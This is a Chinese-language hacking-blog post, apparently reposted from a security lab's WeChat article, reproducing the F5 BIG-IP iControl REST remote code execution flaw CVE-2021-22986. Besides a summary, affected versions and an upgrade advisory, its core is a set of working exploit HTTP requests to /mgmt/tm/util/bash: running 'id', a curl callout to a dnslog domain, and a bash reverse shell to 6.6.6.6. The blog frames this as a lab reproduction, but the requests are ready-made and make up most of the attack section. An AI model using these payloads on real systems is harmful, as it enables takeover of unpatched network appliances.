记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

F5 BIG-IP CVE-2021-22986远程代码执行

2021-03-21 10:46



网安引领时代,弥天点亮未来   






 


0x00漏洞简述

F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。

2021 年3月10日,F5官方发布安全通告,安全更新包含了影响F5的BIG-IP,BIG-IQ设备的多个高危漏洞,漏洞编号分别为CVE-2021-22986,CVE-2021-22987,CVE-2021-22988,CVE-2021-22989,CVE-2021-22990,CVE-2021-22991,CVE-2021-22992;其中CVE-2021-22986为F5 BIG-IP/IQ设备 iControl REST接口的未授权远程代码执行漏洞,漏洞评分9.8,评级严重。F5安全公告更新了BIG-IP,BIG-IQ中的多个严重漏洞。建议广大用户及时将f5 big-iq,f5 big-ip升级到最新版本,避免遭到攻击。



0x01漏洞简述

BIG-IP 16.0.0-16.0.1
       BIG-IP15.1.0-15.1.2
       BIG-IP14.1.0-14.1.3.1
       BIG-IP13.1.0-13.1.3.5
       BIG-IP12.1.0-12.1.5.2
       BIG-IQ7.1.0-7.1.0.2
       BIG-IQ7.0.0-7.0.0.1
       BIG-IQ6.0.0-6.1.0



0x02漏洞复现

部署安装F5 BIG-IPV漏洞测试靶场环境。

1、访问漏洞环境

2、POC验证,进行命令执行操作

1.系统命令执行

POST/mgmt/tm/util/bash HTTP/1.1Host: 192.168.3.112Connection: closeContent-Length: 41Cache-Control:max-age=0Authorization: BasicYWRtaW46QVNhc1M=X-F5-Auth-Token:Upgrade-Insecure-Requests:1Content-Type:application/json {"command":"run","utilCmdArgs":"-c id"}

2.通过dnslog探测是否可以出网

生成域名:zg8ie5.dnslog.cn

出网探测

POST/mgmt/tm/util/bash HTTP/1.1Host: 192.168.3.112Connection: closeContent-Length: 62Cache-Control:max-age=0Authorization: BasicYWRtaW46QVNhc1M=X-F5-Auth-Token:Upgrade-Insecure-Requests:1Content-Type:application/json {"command":"run","utilCmdArgs":"-c 'curl zg8ie5.dnslog.cn'"}

发现可以出网


3.通过bash反弹shell到vps

POST/mgmt/tm/util/bash HTTP/1.1Host: 192.168.3.112Connection: closeContent-Length: 83Cache-Control:max-age=0Authorization: BasicYWRtaW46QVNhc1M=X-F5-Auth-Token:Upgrade-Insecure-Requests:1Content-Type:application/json {"command":"run","utilCmdArgs":"-c 'bash -i >&/dev/tcp/6.6.6.6/12377 0>&1'"}


      漏洞验证python脚本

https://github.com/PeiQi0/PeiQi-WIKI-POC



0x03修复建议

升级到最新版本


0x04参考链接

https://mp.weixin.qq.com/s/ZtE7R4PPgdWY9ea06A9wqQ

https://mp.weixin.qq.com/s/lyrVwgSnu0iSehVr3lZiRw




 

知识分享完了

喜欢别忘了关注我们哦~



学海浩茫,
予以风动,
必降弥天之润!


   弥  天

安全实验室



知识来源: https://mp.weixin.qq.com/s?__biz=MzU2NDgzOTQzNw==&mid=2247486560&idx=1&sn=e1c9467e8856be01e3ea023133fa29bc

阅读:209899 | 评论:0 | 标签:CVE 远程 执行

想收藏或者和大家分享这篇好文章→复制链接地址

“F5 BIG-IP CVE-2021-22986远程代码执行”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

广而告之 💖

标签云 ☁